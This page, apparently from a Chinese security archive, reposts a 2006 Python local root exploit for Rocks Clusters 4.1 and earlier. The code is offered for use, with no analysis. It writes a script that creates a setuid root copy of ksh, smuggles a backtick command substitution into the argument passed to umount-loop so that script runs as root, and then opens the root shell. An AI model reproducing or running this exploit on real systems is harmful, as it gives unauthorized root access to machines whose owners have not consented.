Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit
|
来源:http://xavsec.blogspot.com 作者:xavier 发布时间:2006-07-17
|
|
#!/usr/bin/env python ############################################################################## ## rocksumountdirty.py: Rocks release <=4.1 local root exploit ## quick and nasty version of the exploit. make sure the . is writable and ## you clean up afterwards. ;) ## ## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com] ############################################################################## x=__import__('os');c=x.getcwd() open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c)) print "Rocks Clusters <=4.1 umount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]" x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c)
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|